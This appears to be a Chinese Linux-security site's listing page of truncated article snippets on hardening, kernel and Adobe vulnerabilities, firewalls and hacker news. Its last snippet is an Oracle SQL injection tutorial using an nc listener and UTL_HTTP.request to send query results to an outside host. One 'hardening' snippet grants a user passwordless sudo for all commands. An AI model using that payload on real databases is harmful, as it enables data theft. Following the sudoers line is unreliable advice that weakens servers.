限制控制台访问以提高Linux服务器安全

2016年10月21日 11 阅读

控制台是部署Linux服务器的主要窗口之一。但是Linux服务器部署完成之后，这个控制台反而有可能成为危害其安全的罪魁祸首之一。为此Linux服务器投入生产使用之后，就需要对其访问进行限制。否则的话有可能会对Linux服务器带来安全隐患。 一、限制控制台访问。 在Linux操作系统中所有的命令在系统中都是以文件的形式体现出来的。或者说，文件就是Linux操作系统中的核心。如果需要限制或者禁用控制台下的访问，只需要把某些文件的连接注视掉即可。如系统管理员...

Linux：魔兽争霸自定义地图解释器存在安全漏洞

2016年10月21日 10 阅读

近日，War3自定义地图的解释器Jass虚拟机爆出运行任意代码漏洞，War3自定义地图已经完全有可能携带病毒、木马。这个漏洞适用于Windows操作系统与Linux操作系统，并适合用于各版本地图。这意味着，当你运行War3地图时，很可能同时也在运行病毒木马。除非你是一个代码高手，能看懂所有代码，否则近期还是先不要玩任何非官方的War3地图了。对于喜爱玩War3的玩家这真的是一个噩耗，看来今后的地图都不安全了。限制控制台访问以提高Linux服务器安全Adob...

Adobe：5月12日修复Reader和Acrobat漏洞

2016年10月21日 10 阅读

Adobe安全团队表示最迟会在下周二修复Adobe Reader和Acrobat中存在的zero-day漏洞，修复版本包括Windows系统中的9.X、8.X、7.X版本和Mac、Linux系统中的9.X、8.X版本。上周，Adobe承认了在RSA安全大会上F-Secure安全专家发现的zero-day漏洞，另外也确认了Unix中的Adobe Reader存在的第二个漏洞（VCE-2009-1493），并且表示会在即将发布的Adobe Reader for...

安全经验：看高手如何对付DDoS攻击

2016年10月21日 10 阅读

不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击都瘫痪的情况呢？就网络安全而言目前最让人担心和害怕的入侵攻击就要算是拒绝服务（DDoS）攻击了。他和传统的攻击不同，采取的是仿真多个客户端来连接服务器，造成服务器无法完成如此多的客户端连接，从而无法提供服务。 一、拒绝服务攻击的发展 从拒绝服务攻击诞生到现在已经有了很多的发展，从最初的简单Dos到现在的DdoS。那么什么是Dos和DdoS呢？DoS是一种利用单台计算机的攻击 方式。而DdoS（Di...

利用Linux系统IP伪装抵住黑客攻击

2016年10月21日 10 阅读

防火墙可分为几种不同的安全等级。在Linux中，由于有许多不同的防火墙软件可供选择，安全性可低可高，最复杂的软件可提供几乎无法渗透的保护能力。不过，Linux核心本身内建了一种称作“伪装”的简单机制，除了最专门的黑客攻击外，可以抵挡住绝大部分的攻击行动。 当我们拨号接连上Internet后，我们的计算机会被赋给一个IP地址，可让网上的其他人回传资料到我们的计算机。黑客就是用你的IP来存取你计算机上的资料。Linux所用的“IP伪装”法，就是把你的IP藏起...

安全检测Unix和Linux服务器入门精讲

2016年10月21日 10 阅读

尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性，然而由于系统管理员的水平参差不齐或安全意识底下，往往给黑客提供了入侵的机会。其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多，但是因为实际情况的不同，往往造成许多方法的失效；由此可见，每一个网站的情况都不同，需要入侵者区分对待。假设深圳的线路比北京的线路要好的多，从而给了词典穷举很大的方便，深圳用户就可以依靠这个优势在线攻击口令，作为北京的用户就需要优先考虑其它办法了。针对...

Linux Kernel af_rose实现整数溢出漏洞

2016年10月21日 10 阅读

发布日期：2009-04-08更新日期：2009-05-07受影响系统：Linux kernel 2.6.x不受影响系统：Linux kernel 2.6.30-rc1描述：--------------------------------------------------------------------------------BUGTRAQ ID: 34654CVE（CAN） ID: CVE-2009-1265Linux Kernel是开放源码操作系...

通过APF和BFD来加强Linux防火墙安全

2016年10月21日 10 阅读

在安装BFD前，请务必确认您已经安装了APF，因为BDF将用到APF中的部分功能和特性。 下载最新版的BFD：wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz 解压并切换至该目录： tar -xzvf bfd-current.tar.gz cd bfd-版本 安装： ./install.sh 安装完以后，开始配置BFD： nano /usr/local/bfd/conf.bf...

Linux Kernel keyctl_join_session_keyring（）函数本地拒绝服务漏洞

2016年10月21日 10 阅读

发布日期：2009-01-18更新日期：2009-05-11受影响系统：Linux kernel 2.6.x不受影响系统：Linux kernel 2.6.29-rc2-git1描述：--------------------------------------------------------------------------------BUGTRAQ ID: 33339CVE（CAN） ID: CVE-2009-0031Linux Kernel是开放...

Linux系统安全加固

2016年10月21日 10 阅读

一、安装和升级使用custom自定义安装，不必要的软件包尽量不装，如有必要给lilo/grub引导器加入口令限制，安装完成后使用up2date、yum或是apt（Debian）升级系统软件，有时升级内核也是必要的。编辑 /etc/sudoers 添加下面内容jinshuai ALL=NOPASSWD:ALL二、帐号安全1、一般Linux服务器都是放在IDC机房，需要通过远程访问进行管理，要限制root的远程访问，管理员通过普通帐号远程登录，然后su到roo...

MINIX 3称要比Linux与Windows更安全

2016年10月21日 10 阅读

如果MINIX 3不给外人用，它一定会很安全的，像这种操作系统最好用于国防或其它保密行业。我国要是能开发一款安全操作系统用于关键行业倒是要大力支持，也不要什么Linux了，反正自己用的东西没必要太多的应用，多人用反而显示出它的脆弱。Linux系统安全加固Linux服务器安全策略详解相关资讯 Linux安全 发现针对 Linux 服务器和代码库的 （11/08/2015 09:11:50）Linux安全与优化 （12/05/2014 17:04:31）加...

Linux服务器安全策略详解

2016年10月21日 10 阅读

Linux网络结构的特点Linux在服务器领域已经非常成熟，其影响力日趋增大。Linux的网络服务功能非常强大，但是由于Linux的桌面应用和Windows相比还有一定差距，除了一些Linux专门实验室之外，大多数企业在应用Linux系统时，往往是Linux和Windows（或UNIX）等操作系统共存形成的异构网络。在一个网络系统中，操作系统的地位是非常重要的。Linux网络操作系统以高效性和灵活性而著称。它能够在PC上实现全部的UNIX特性，具有多任务、...

Linux一月内三爆漏洞 管理员速补ptrace 0day

2016年10月21日 10 阅读

Linux在最近30天内实在是倒大霉了。先是4月20号的udev本地提权漏洞，然后是4月28号的SCTP远程溢出漏洞，今天就来了个ptrace_attach本地提权漏洞，还是0day！没补丁！感谢安全专家sowhat第一时间提供漏洞信息！漏洞利用程序，原理应该是通过ptrace挂到一个suid root程序上，然后利用ptrace_attach函数的漏洞，以root权限执行指令，产生/tmp/.exp这个local root shell。不幸中的万幸，这个...

Adobe发布补丁，修复因JavaScript引起的PDF零日漏洞

2016年10月21日 13 阅读

Adobe发布了一个补丁用来修复4月末发现的一个高风险漏洞，Adobe Reader中的"getAnnots（）" JavaScript功能出现安全漏洞，可能让黑客执行任意程序。而这一漏洞影响Adobe Reader与Acrobat 9.1、8.1.4、7.1.1及更早的版本，所有平台都会受影响。该漏洞为一个边界条件错误，黑客得以趁机取得使用者权限执行任意程序，或无预警关闭该应用程序。目前Adobe已经在官方网站上发布相关补丁，详情请访问以下链接：访问:S...

教你破解Linux的root密码[多图]

2016年10月21日 10 阅读

教你破解Linux的root密码，呵呵，大家可以尝试下，但是不要做坏事啊，好在修改我的引导程序也需要密码，大家也要注意啊！ 最后一步键入“EXIT”回车后，电脑会自动重新启动，到这里就破解了根用户的密码。 呵呵，大家可以尝试下，但是不要做坏事啊，好在修改我的引导程序也需要密码，大家也要注意啊！Adobe发布补丁，修复因JavaScript引起的PDF零日漏洞Ubuntu防火墙 UFW 设置简介相关资讯 Linux安全 发现针对 Li...

Ubuntu防火墙 UFW 设置简介

2016年10月21日 10 阅读

Ubuntu 系统默认已安装UFW。相关阅读：Ubuntu 8.10下安装设置Gufw-ufw图形界面防火墙[多图]http://www.linuxidc.com/Linux/2008-11/17166.htm1.安装sudo apt-get install ufw2.启用sudo ufw enablesudo ufw default deny运行以上两条命令后，开启了防火墙，并在系统启动时自动开启。关闭所有外部对本机的访问，但本机访问外部正常。3.开启/...

微软修正PowerPoint漏洞 防止海运女殷虹病毒攻击

2016年10月21日 10 阅读

近段时间以来“海运女艳照门”照片成为一些网民关注的热点，但是黑客却在Windows下利用此焦点事件传毒的事件有增多的趋势，在5月14日就有近百个相关带毒论坛、网站被截获，其中植入的木马绝大部分会窃取网游帐号、下载其它恶意程序等。不过Linux系统下不会有事。如果你想看，最好切换到Linux系统。 不过，微软周二发布一款补丁软件修正了PowerPoint电子表格软件中一处“危急”缺陷。 据国外媒体报道称，该缺陷在Office 2000中的危险等级为“危急...

采用Linux系统 常熟全面启动中小学“龙芯数字学堂”建设

2016年10月21日 10 阅读

由江苏龙芯梦兰科技股份有限公司与教育部教学仪器研究所、中科院计算技术研究所、华东师范大学等共同开发的“龙芯数字学堂”教育信息化解决方案在常熟成功应用。这是采用我国自主研发的高性能龙芯CPU，完全拥有自主知识产权，采用Linux系统。目前，龙芯电脑已批量生产，走向市场。常熟市政府首次采购1万台龙芯电脑配备本市中小学，用于中小学数字学堂建设。5月8日，全市首家“龙芯数字学堂”在苏州市科技教育特色学校---常熟市实验小学建成。所谓“数字学堂”，既是带有丰富资源的...

中国最美女黑客视频澄清质疑 称不会违法敛财[图文]

2016年10月21日 12 阅读

被冠上“中国最美女黑客”头衔的上海女孩“YingCracker”最近迅速在网络蹿红。不论是她公布的木马破解技术，还是每月上万元的收入，都让不少网友崇拜不已。但与此同时，也有网友对其性别、技术能力和目的提出质疑。昨晚，“YingCracker”与记者通过视频聊天，以证实她确为女性，她同时还表示，自己不会利用黑客技术违法敛财。 “最美女黑客”被疑是男性 昨天 ， 记者进入了“YingCracker”的QQ空间，其日志内容都是软件密码及文件破解、程序漏洞...

Oracle注射技术——Oracle+nc注射

2016年10月21日 10 阅读

首先外网nc监听对应的端口 and UTL_HTTP.request（"外网ip:port/"（sql语句））=1-- 爆库： select owner from all_tables where rownum=1 select owner from all_tables where owner<>"第一个库名" and rownum=1 select owner from all_tables where owner<>...